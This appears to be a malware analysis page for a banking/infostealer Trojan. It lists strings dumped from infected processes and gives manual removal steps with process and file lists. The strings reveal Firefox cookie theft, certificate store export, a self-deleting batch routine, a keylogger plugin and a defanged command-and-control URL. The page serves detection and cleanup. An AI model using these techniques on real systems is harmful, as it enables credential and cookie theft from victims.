SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
PSSSSSSh
3$3*30383
6|7k7u7
9 :1:::@:
42>204:4
sXXXX
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}

svchost.exe_2084_rwx_00E00000_0006C000:

<1%u3
t8It.IIt#
.FGyO
FTPj
YPSSSh
9t$Lt.VV
,4,56,789
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
%Documents and Settings%\%current user%\Application Data\svchost.exe
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

dwm.exe_440_rwx_00130000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
6;:5;66"
,1;(,; = 1
<! 8< ;-;
'472%9,{
F@ICTQ}cRTWAunO}mmts}NX~csgzn~)[jzyemer\]ika
8/3.xae4LOa
6 !26!1'1!
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
SSShD
SSShXe
SSShye
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
PSSSSSSh
3$3*30383
6|7k7u7
9 :1:::@:
42>204:4
sXXXX
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}

dwm.exe_440_rwx_00400000_00008000:

.text
`.data
.rsrc
MSVBVM60.DLL
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
user32.dll
SetWindowsHookExA
UnhookWindowsHookEx
kernel32.dll
GetAsyncKeyState
@*\AC:\Users\Edbitss\Documents\gorynych\source\Plugins\keylogger\Local_Security_Authority_Process.vbp
\KY.html
Key-Spy Report -
>[KEYLOGGER REPORT]</span></span></p>
4.07.0046
Hook.exe

Explorer.EXE_880_rwx_01F10000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
6;:5;66"
,1;(,; = 1
<! 8< ;-;
'472%9,{
F@ICTQ}cRTWAunO}mmts}NX~csgzn~)[jzyemer\]ika
8/3.xae4LOa
6 !26!1'1!
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
SSShD
SSShXe
SSShye
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
PSSSSSSh
3$3*30383
6|7k7u7
9 :1:::@:
42>204:4
sXXXX
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Muaz\ydfeb.ofo
%Documents and Settings%\%current user%\Application Data\Muaz
ydfeb.ofo


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    xcopy.exe:2188
    cscript.exe:844
    cscript.exe:2216
    cscript.exe:2028
    cscript.exe:2080
    cscript.exe:3876
    cscript.exe:2988
    cscript.exe:2680
    cscript.exe:2372
    %original file name%.exe:1308
    scvhost.exe:2464
    scvhost.exe:3252
    scvhost.exe:1208
    scvhost.exe:1100
    tasklist.exe:2880
    loader.exe:1512
    ibza.exe:976
    hostname.exe:2756
    ipconfig.exe:3116
    soft.exe:604
    soft.exe:284
    fffffffffffffff.exe:3440
    netsh.exe:3540

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\Oracle\lib\rt.jar (336534 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\npjpi160_18.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\ssv.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\new_plugin\npdeploytk.dll (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\audio\soundbank.gm (3073 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_de.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\plugin.jar (11518 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\policytool.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\jvm.hprof.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\rmi.dll (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\instrument.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpioji.dll (65 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\management-agent.jar (382 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\java.exe (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\npt.dll (8 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\pack200.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\j2pcsc.dll (7 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\rmid.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jqs.exe (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpishare.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\sunmscapi.dll (16 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\javacpl.exe (59 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\new_plugin\msvcr71.dll (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_ja.properties (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jkernel.dll (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\psfont.properties.ja (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_zh_TW.rtf (29 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\hpi.dll (15 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\ssvagent.exe (30 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_ko.properties (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_sv.rtf (45 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\unpack200.exe (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\task.xml (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpiexp.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpinscp.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jsound.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages.properties (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\client\jvm.dll (18248 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\cmm.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\flavormap.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\unpack.dll (61 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\msvcrt.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jbroker.exe (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\javacpl.cpl (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\README.txt (16 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\management.dll (18 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\PYCC.pf (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_it.rtf (25 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.98.bfc (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_fr.rtf (37 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\msvcr71.dll (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\fontmanager.dll (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\CIEXYZ.pf (51 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jdwp.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\java.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\tzmappings (7 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\tnameserv.exe (33 bytes)
